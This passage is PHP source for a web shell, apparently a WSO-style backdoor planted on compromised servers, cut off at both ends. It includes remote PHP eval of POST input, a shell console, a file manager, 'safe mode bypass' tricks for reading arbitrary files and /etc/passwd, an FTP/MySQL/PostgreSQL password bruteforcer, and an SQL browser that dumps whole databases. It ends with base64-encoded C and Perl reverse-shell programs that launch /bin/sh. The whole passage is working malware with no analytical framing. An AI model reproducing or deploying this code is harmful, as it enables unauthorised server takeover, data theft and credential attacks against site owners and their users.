\'; \r\n ob_start(); \r\n phpinfo(); \r\n $tmp = ob_get_clean(); \r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp); \r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp); \r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp); \r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp); \r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp); \r\n echo $tmp; \r\n echo \'

\'; \r\n } \r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; \r\n echo \'

Execution PHP-code

\'; \r\n echo \' send using AJAX
\'; \r\n    if(!empty($_POST[\'p1\'])) { \r\n        ob_start(); \r\n        eval($_POST[\'p1\']); \r\n        echo htmlspecialchars(ob_get_clean()); \r\n    } \r\n    echo \'
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionFilesMan() { \r\n printHeader(); \r\n echo \'

File manager

\'; \r\n if(isset($_POST[\'p1\'])) { \r\n switch($_POST[\'p1\']) { \r\n case \'uploadFile\': \r\n if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) \r\n echo "Can\'t upload file!"; \r\n break; \r\n break; \r\n case \'mkdir\': \r\n if(!@mkdir($_POST[\'p2\'])) \r\n echo "Can\'t create new dir"; \r\n break; \r\n case \'delete\': \r\n function deleteDir($path) { \r\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\'; \r\n $dh = opendir($path); \r\n while ( ($item = readdir($dh) ) !== false) { \r\n $item = $path.$item; \r\n if ( (basename($item) == "..") || (basename($item) == ".") ) \r\n continue; \r\n $type = filetype($item); \r\n if ($type == "dir") \r\n deleteDir($item); \r\n else \r\n @unlink($item); \r\n } \r\n closedir($dh); \r\n rmdir($path); \r\n } \r\n if(is_array(@$_POST[\'f\'])) \r\n foreach($_POST[\'f\'] as $f) { \r\n $f = urldecode($f); \r\n if(is_dir($f)) \r\n deleteDir($f); \r\n else \r\n @unlink($f); \r\n } \r\n break; \r\n case \'paste\': \r\n if($_SESSION[\'act\'] == \'copy\') { \r\n function copy_paste($c,$s,$d){ \r\n if(is_dir($c.$s)){ \r\n mkdir($d.$s); \r\n $h = opendir($c.$s); \r\n while (($f = readdir($h)) !== false) \r\n if (($f != ".") and ($f != "..")) { \r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); \r\n } \r\n } elseif(is_file($c.$s)) { \r\n @copy($c.$s, $d.$s); \r\n } \r\n } \r\n foreach($_SESSION[\'f\'] as $f) \r\n copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']); \r\n } elseif($_SESSION[\'act\'] == \'move\') { \r\n function move_paste($c,$s,$d){ \r\n if(is_dir($c.$s)){ \r\n mkdir($d.$s); \r\n $h = opendir($c.$s); \r\n while (($f = readdir($h)) !== false) \r\n if (($f != ".") and ($f != "..")) { \r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); \r\n } \r\n } elseif(is_file($c.$s)) { \r\n @copy($c.$s, $d.$s); \r\n } \r\n } \r\n foreach($_SESSION[\'f\'] as $f) \r\n @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f); \r\n } \r\n unset($_SESSION[\'f\']); \r\n break; \r\n default: \r\n if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { \r\n $_SESSION[\'act\'] = @$_POST[\'p1\']; \r\n $_SESSION[\'f\'] = @$_POST[\'f\']; \r\n foreach($_SESSION[\'f\'] as $k => $f) \r\n $_SESSION[\'f\'][$k] = urldecode($f); \r\n $_SESSION[\'cwd\'] = @$_POST[\'c\']; \r\n } \r\n break; \r\n } \r\n echo \'\'; \r\n } \r\n $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']); \r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\'; return; }\r\n global $sort; \r\n $sort = array(\'name\', 1); \r\n if(!empty($_POST[\'p1\'])) { \r\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) \r\n $sort = array($match[1], (int)$match[2]); \r\n } \r\n?> \r\n \r\n \r\n \r\n"; \r\n $dirs = $files = $links = array(); \r\n $n = count($dirContent); \r\n for($i=0;$i<$n;$i++) { \r\n $ow = @posix_getpwuid(@fileowner($dirContent[$i])); \r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i])); \r\n $tmp = array(\'name\' => $dirContent[$i], \r\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \r\n \'modify\' => date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \r\n \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \r\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \r\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) \r\n ); \r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) \r\n $files[] = array_merge($tmp, array(\'type\' => \'file\')); \r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) \r\n $links[] = array_merge($tmp, array(\'type\' => \'link\')); \r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) \r\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\')); \r\n } \r\n $GLOBALS[\'sort\'] = $sort; \r\n function cmp($a, $b) { \r\n if($GLOBALS[\'sort\'][0] != \'size\') \r\n return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1); \r\n else \r\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1); \r\n } \r\n usort($files, "cmp"); \r\n usort($dirs, "cmp"); \r\n usort($links, "cmp"); \r\n $files = array_merge($dirs, $links, $files); \r\n $l = 0; \r\n foreach($files as $f) { \r\n echo \'\'; \r\n $l = $l?0:1; \r\n } \r\n ?> \r\n \r\n
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');">[ \'.htmlspecialchars($f[\'name\']).\' ]\').\'\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\'] \r\n .\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
\r\n \r\n \'> \r\n \'> \r\n  
\r\n String conversions
\'; \r\n $stringTools = array( \r\n \'Base64 encode\' => \'base64_encode\', \r\n \'Base64 decode\' => \'base64_decode\', \r\n \'Url encode\' => \'urlencode\', \r\n \'Url decode\' => \'urldecode\', \r\n \'Full urlencode\' => \'full_urlencode\', \r\n \'md5 hash\' => \'md5\', \r\n \'sha1 hash\' => \'sha1\', \r\n \'crypt\' => \'crypt\', \r\n \'CRC32\' => \'crc32\', \r\n \'ASCII to HEX\' => \'ascii2hex\', \r\n \'HEX to ASCII\' => \'hex2ascii\', \r\n \'HEX to DEC\' => \'hexdec\', \r\n \'HEX to BIN\' => \'hex2bin\', \r\n \'DEC to HEX\' => \'dechex\', \r\n \'DEC to BIN\' => \'decbin\', \r\n \'BIN to HEX\' => \'bin2hex\', \r\n \'BIN to DEC\' => \'bindec\', \r\n \'String to lower case\' => \'strtolower\', \r\n \'String to upper case\' => \'strtoupper\', \r\n \'Htmlspecialchars\' => \'htmlspecialchars\', \r\n \'String length\' => \'strlen\', \r\n ); \r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; \r\n echo "
>\'/> send using AJAX
"; \r\n    if(!empty($_POST[\'p1\'])) { \r\n        if(function_exists($_POST[\'p1\'])) \r\n        echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\'])); \r\n    } \r\n    echo"
"; \r\n ?> \r\n

Search for hash:

\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n File tools
\'; \r\n if( !file_exists(@$_POST[\'p1\']) ) { \r\n echo \'File not exists\'; \r\n printFooter(); \r\n return; \r\n } \r\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\'])); \r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\'])); \r\n echo \'Name: \'.htmlspecialchars($_POST[\'p1\']).\' Size: \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.viewPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\'; \r\n echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\'; \r\n if( empty($_POST[\'p2\']) ) \r\n $_POST[\'p2\'] = \'view\'; \r\n if( is_file($_POST[\'p1\']) ) \r\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\'); \r\n else \r\n $m = array(\'Chmod\', \'Rename\', \'Touch\'); \r\n foreach($m as $v) \r\n echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \'; \r\n echo \'

\'; \r\n switch($_POST[\'p2\']) { \r\n case \'view\': \r\n echo \'
\'; \r\n            $fp = @fopen($_POST[\'p1\'], \'r\'); \r\n            if($fp) { \r\n                while( !@feof($fp) ) \r\n                    echo htmlspecialchars(@fread($fp, 1024)); \r\n                @fclose($fp); \r\n            } \r\n            echo \'
\'; \r\n break; \r\n case \'highlight\': \r\n if( is_readable($_POST[\'p1\']) ) { \r\n echo \'
\'; \r\n $code = highlight_file($_POST[\'p1\'],true); \r\n echo str_replace(array(\'\'), array(\'\'),$code).\'
\'; \r\n } \r\n break; \r\n case \'chmod\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n $perms = 0; \r\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i) \r\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1)); \r\n if(!@chmod($_POST[\'p1\'], $perms)) \r\n echo \'Can\\\'t set permissions!
\'; \r\n else \r\n die(\'\'); \r\n } \r\n echo \'
\'; \r\n break; \r\n case \'edit\': \r\n if( !is_writable($_POST[\'p1\'])) { \r\n echo \'File isn\\\'t writeable\'; \r\n break; \r\n } \r\n if( !empty($_POST[\'p3\']) ) { \r\n @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']); \r\n echo \'Saved!
\'; \r\n } \r\n echo \'
\'; \r\n break; \r\n case \'hexdump\': \r\n $c = @file_get_contents($_POST[\'p1\']); \r\n $n = 0; \r\n $h = array(\'00000000
\',\'\',\'\'); \r\n $len = strlen($c); \r\n for ($i=0; $i<$len; ++$i) { \r\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \'; \r\n switch ( ord($c[$i]) ) { \r\n case 0: $h[2] .= \' \'; break; \r\n case 9: $h[2] .= \' \'; break; \r\n case 10: $h[2] .= \' \'; break; \r\n case 13: $h[2] .= \' \'; break; \r\n default: $h[2] .= $c[$i]; break; \r\n } \r\n $n++; \r\n if ($n == 32) { \r\n $n = 0; \r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';} \r\n $h[1] .= \'
\'; \r\n $h[2] .= "\\n"; \r\n } \r\n } \r\n echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\'; \r\n break; \r\n case \'rename\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) \r\n echo \'Can\\\'t rename!
\'; \r\n else \r\n die(\'\'); \r\n } \r\n echo \'
\'; \r\n break; \r\n case \'touch\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n $time = strtotime($_POST[\'p3\']); \r\n if($time) { \r\n if(@touch($_POST[\'p1\'],$time,$time)) \r\n die(\'\'); \r\n else { \r\n echo \'Fail!\'; \r\n } \r\n } else echo \'Bad time format!\'; \r\n } \r\n echo \'
\'; \r\n break; \r\n case \'mkfile\': \r\n \r\n break; \r\n } \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionSafeMode() { \r\n $temp=\'\'; \r\n ob_start(); \r\n switch($_POST[\'p1\']) { \r\n case 1: \r\n $temp=@tempnam($test, \'cx\'); \r\n if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){ \r\n echo @file_get_contents($temp); \r\n unlink($temp); \r\n } else \r\n echo \'Sorry... Can\\\'t open file\'; \r\n break; \r\n case 2: \r\n $files = glob($_POST[\'p2\'].\'*\'); \r\n if( is_array($files) ) \r\n foreach ($files as $filename) \r\n echo $filename."\\n"; \r\n break; \r\n case 3: \r\n $ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH); \r\n curl_exec($ch); \r\n break; \r\n case 4: \r\n ini_restore("safe_mode"); \r\n ini_restore("open_basedir"); \r\n include($_POST[\'p2\']); \r\n break; \r\n case 5: \r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) { \r\n $uid = @posix_getpwuid($_POST[\'p2\']); \r\n if ($uid) \r\n echo join(\':\',$uid)."\\n"; \r\n } \r\n break; \r\n case 6: \r\n if(!function_exists(\'imap_open\'))break; \r\n $stream = imap_open($_POST[\'p2\'], "", ""); \r\n if ($stream == FALSE) \r\n break; \r\n echo imap_body($stream, 1); \r\n imap_close($stream); \r\n break; \r\n } \r\n $temp = ob_get_clean(); \r\n printHeader(); \r\n echo \'

Safe mode bypass

\'; \r\n echo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
\'; \r\n if($temp) \r\n echo \'
\'.$temp.\'
\'; \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionConsole() { \r\n if(isset($_POST[\'ajax\'])) { \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; \r\n ob_start(); \r\n echo "document.cf.cmd.value=\'\';\\n"; \r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0")); \r\n if(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match)) { \r\n if(@chdir($match[1])) { \r\n $GLOBALS[\'cwd\'] = @getcwd(); \r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';"; \r\n } \r\n } \r\n echo "document.cf.output.value+=\'".$temp."\';"; \r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; \r\n $temp = ob_get_clean(); \r\n echo strlen($temp), "\\n", $temp; \r\n exit; \r\n } \r\n printHeader(); \r\n?> \r\n \r\nConsole
send using AJAX
\'; \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionLogout() { \r\n unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n echo \'bye!\'; \r\n} \r\n\r\nfunction actionSelfRemove() { \r\n printHeader(); \r\n if($_POST[\'p1\'] == \'yes\') { \r\n if(@unlink(SELF_PATH)) \r\n die(\'Shell has been removed\'); \r\n else \r\n echo \'unlink error!\'; \r\n } \r\n echo \'

Suicide

Really want to remove the shell?
Yes
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionBruteforce() { \r\n printHeader(); \r\n if( isset($_POST[\'proto\']) ) { \r\n echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\'; \r\n if( $_POST[\'proto\'] == \'ftp\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $fp = @ftp_connect($ip, $port?$port:21); \r\n if(!$fp) return false; \r\n $res = @ftp_login($fp, $login, $pass); \r\n @ftp_close($fp); \r\n return $res; \r\n } \r\n } elseif( $_POST[\'proto\'] == \'mysql\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass); \r\n @mysql_close($res); \r\n return $res; \r\n } \r\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=\'\'"; \r\n $res = @pg_connect($server[0].\':\'.$server[1]?$server[1]:5432, $login, $pass); \r\n @pg_close($res); \r\n return $res; \r\n } \r\n } \r\n $success = 0; \r\n $attempts = 0; \r\n $server = explode(":", $_POST[\'server\']); \r\n if($_POST[\'type\'] == 1) { \r\n $temp = @file(\'/etc/passwd\'); \r\n if( is_array($temp) ) \r\n foreach($temp as $line) { \r\n $line = explode(":", $line); \r\n ++$attempts; \r\n if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { \r\n $success++; \r\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\'; \r\n } \r\n if(@$_POST[\'reverse\']) { \r\n $tmp = ""; \r\n for($i=strlen($line[0])-1; $i>=0; --$i) \r\n $tmp .= $line[0][$i]; \r\n ++$attempts; \r\n if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { \r\n $success++; \r\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp); \r\n } \r\n } \r\n } \r\n } elseif($_POST[\'type\'] == 2) { \r\n $temp = @file($_POST[\'dict\']); \r\n if( is_array($temp) ) \r\n foreach($temp as $line) { \r\n $line = trim($line); \r\n ++$attempts; \r\n if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) { \r\n $success++; \r\n echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\'; \r\n } \r\n } \r\n } \r\n echo "Attempts: $attempts Success: $success

"; \r\n } \r\n echo \'

FTP bruteforce

\' \r\n .\'\' \r\n .\'\' \r\n .\'\' \r\n .\'\' \r\n .\'\' \r\n .\'\' \r\n .\'
Type
\' \r\n .\'\' \r\n .\'\' \r\n .\'\' \r\n .\'Server:port
Brute type
\' \r\n .\'\' \r\n .\'\' \r\n .\'
Login
Dictionary
\' \r\n .\'
\'; \r\n echo \'

\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionSql() { \r\n class DbClass { \r\n var $type; \r\n var $link; \r\n var $res; \r\n function DbClass($type) { \r\n $this->type = $type; \r\n } \r\n function connect($host, $user, $pass, $dbname){ \r\n switch($this->type) { \r\n case \'mysql\': \r\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; \r\n break; \r\n case \'pgsql\': \r\n $host = explode(\':\', $host); \r\n if(!$host[1]) $host[1]=5432; \r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; \r\n break; \r\n } \r\n return false; \r\n } \r\n function selectdb($db) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n if (@mysql_select_db($db))return true; \r\n break; \r\n } \r\n return false; \r\n } \r\n function query($str) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = @mysql_query($str); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = @pg_query($this->link,$str); \r\n break; \r\n } \r\n return false; \r\n } \r\n function fetch() { \r\n $res = func_num_args()?func_get_arg(0):$this->res; \r\n switch($this->type) { \r\n case \'mysql\': \r\n return @mysql_fetch_assoc($res); \r\n break; \r\n case \'pgsql\': \r\n return @pg_fetch_assoc($res); \r\n break; \r\n } \r\n return false; \r\n } \r\n function listDbs() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = @mysql_list_dbs($this->link); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = $this->query("SELECT datname FROM pg_database"); \r\n break; \r\n } \r\n return false; \r\n } \r\n function listTables() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = $this->query(\'SHOW TABLES\'); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'"); \r\n break; \r\n } \r\n return false; \r\n } \r\n function error() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return @mysql_error($this->link); \r\n break; \r\n case \'pgsql\': \r\n return @pg_last_error($this->link); \r\n break; \r\n } \r\n return false; \r\n } \r\n function setCharset($str) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n if(function_exists(\'mysql_set_charset\')) \r\n return @mysql_set_charset($str, $this->link); \r\n else \r\n $this->query(\'SET CHARSET \'.$str); \r\n break; \r\n case \'mysql\': \r\n return @pg_set_client_encoding($this->link, $str); \r\n break; \r\n } \r\n return false; \r\n } \r\n function dump($table) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\'); \r\n $create = mysql_fetch_array($res); \r\n echo $create[1].";\\n\\n"; \r\n $this->query(\'SELECT * FROM `\'.$table.\'`\'); \r\n while($item = $this->fetch()) { \r\n $columns = array(); \r\n foreach($item as $k=>$v) { \r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'"; \r\n $columns[] = "`".$k."`"; \r\n } \r\n echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n"; \r\n } \r\n break; \r\n case \'pgsql\': \r\n $this->query(\'SELECT * FROM \'.$table); \r\n while($item = $this->fetch()) { \r\n $columns = array(); \r\n foreach($item as $k=>$v) { \r\n $item[$k] = "\'".addslashes($v)."\'"; \r\n $columns[] = $k; \r\n } \r\n echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n"; \r\n } \r\n break; \r\n } \r\n return false; \r\n } \r\n }; \r\n $db = new DbClass($_POST[\'type\']); \r\n if(@$_POST[\'p2\']==\'download\') { \r\n ob_start("ob_gzhandler", 4096); \r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']); \r\n $db->selectdb($_POST[\'sql_base\']); \r\n header("Content-Disposition: attachment; filename=dump.sql"); \r\n header("Content-Type: text/plain"); \r\n foreach($_POST[\'tbl\'] as $v) \r\n $db->dump($v); \r\n exit; \r\n } \r\n printHeader(); \r\n ?> \r\n

Sql browser

\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \'> \r\n \'> \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
TypeHostLoginPasswordDatabase
\r\n \'>\'>\'> \r\n "; \r\n if(isset($_POST[\'sql_host\'])){ \r\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { \r\n switch($_POST[\'charset\']) { \r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break; \r\n case "UTF-8": $db->setCharset(\'utf8\'); break; \r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break; \r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break; \r\n case "cp866": $db->setCharset(\'cp866\'); break; \r\n } \r\n $db->listDbs(); \r\n echo "\'; \r\n } \r\n else echo $tmp; \r\n }else \r\n echo $tmp; \r\n ?>
\r\n \r\n link){ \r\n echo "
"; \r\n if(!empty($_POST[\'sql_base\'])){ \r\n $db->selectdb($_POST[\'sql_base\']); \r\n echo ""; \r\n } \r\n echo "
Tables:

"; \r\n $tbls_res = $db->listTables(); \r\n while($item = $db->fetch($tbls_res)) { \r\n list($key, $value) = each($item); \r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\')); \r\n $value = htmlspecialchars($value); \r\n echo " ".$value." (".$n[\'n\'].")
";\r\n } \r\n echo " 		"; \r\n if(@$_POST[\'p1\'] == \'select\') { \r\n $_POST[\'p1\'] = \'query\'; \r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\'); \r\n $num = $db->fetch(); \r\n $num = $num[\'n\']; \r\n echo "".$_POST[\'p2\']." ($num) "; \r\n for($i=0;$i<($num/30);$i++) \r\n if($i != (int)$_POST[\'p3\']) \r\n echo "",($i+1)," "; \r\n else \r\n echo ($i+1)," "; \r\n if($_POST[\'type\']==\'pgsql\') \r\n $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30); \r\n else \r\n $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\'; \r\n echo "

"; \r\n } \r\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { \r\n $db->query(@$_POST[\'p3\']); \r\n if($db->res !== false) { \r\n $title = false; \r\n echo \'\'; \r\n $line = 1; \r\n while($item = $db->fetch()) { \r\n if(!$title) { \r\n echo \'\'; \r\n foreach($item as $key => $value) \r\n echo \'\'; \r\n reset($item); \r\n $title=true; \r\n echo \'\'; \r\n $line = 2; \r\n } \r\n echo \'\'; \r\n $line = $line==1?2:1; \r\n foreach($item as $key => $value) { \r\n if($value == null) \r\n echo \'\'; \r\n else \r\n echo \'\'; \r\n } \r\n echo \'\'; \r\n } \r\n echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\'; \r\n } else { \r\n echo \'
Error: \'.htmlspecialchars($db->error()).\'
\'; \r\n } \r\n } \r\n echo "

"; \r\n echo "

Load file >\'>
"; \r\n if(@$_POST[\'p1\'] == \'loadfile\') { \r\n $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file"); \r\n $file = $db->fetch(); \r\n echo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\r\n } \r\n } \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\nfunction actionNetwork() { \r\n printHeader(); \r\n $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; \r\n $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; \r\n 